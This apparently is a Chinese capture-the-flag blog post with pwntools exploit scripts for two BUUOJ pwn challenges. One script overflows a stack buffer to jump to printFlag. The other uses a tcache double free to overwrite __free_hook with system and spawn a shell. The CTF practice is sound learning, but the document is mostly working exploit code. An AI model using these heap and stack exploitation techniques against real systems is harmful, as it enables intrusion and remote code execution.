在家希望武汉的师傅们一切都好~~
bbys_tu_2016
这道有点没搞清额额flag文件是flag.txt是能control但是好像不能ROP也是能读到flag文件的就很简单了还有似乎文件没写好setbuf函数不会先出现io流
exp:
#!/usr/bin/python2
from pwn import *
local=0
if local==1:
p=process('../binary/bbys_tu_2016')
elf=ELF('../binary/bbys_tu_2016')
else:
p=remote('node3.buuoj.cn',25744)
elf=ELF('../binary/bbys_tu_2016')
def exp():
main=0x080485C9
payload='a'*0x18+p32(elf.sym['printFlag'])
p.sendline(payload)
p.interactive()
if __name__=="__main__":
exp()
xm_2019_awd_pwn2
直接tcache double free拿到free_hook甚至都不会检查size是否存在使得漏洞利用变得极为的简单打到free_hook写成system然后布置好chunk free拿到shell
exp:
#!/usr/bin/python2
from pwn import *
local=0
if local==1:
p=process('./xm_2019_awd_pwn2')
elf=ELF('./xm_2019_awd_pwn2')
libc=elf.libc
else:
p=remote('node3.buuoj.cn',25112)
elf=ELF('./xm_2019_awd_pwn2')
libc=elf.libc
def add(size,content):
p.sendlineafter('>>','1')
p.sendlineafter('size:',str(size))
p.sendlineafter('content:',content)
def delete(idx):
p.sendlineafter('>>','2')
p.sendlineafter('idx:',str(idx))
def show(idx):
p.sendlineafter('>>','3')
p.sendlineafter('idx:',str(idx))
lg=lambda address,data:log.success('%s: '%(address)+hex(data))
def exp():
add(0x500,'doudou') #0
add(0x500,'douodu1') #1
delete(0)
show(0)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['__malloc_hook']-0x10-96
#lg('libcbase',libcbase)
system=libcbase+libc.sym['system']
free_hook=libcbase+libc.sym['__free_hook']
add(0x60,'doudou1')#2
add(0x60,'doudou2')#3
delete(2)
delete(2)
add(0x60,p64(free_hook))
add(0x60,'doudou3')#4
add(0x60,p64(system))#5
add(0x20,'/bin/sh\x00')#6
lg('libcbase',libcbase)
p.sendlineafter('>>','2')
p.sendlineafter('idx:','7')
p.interactive()
if __name__=="__main__":
exp()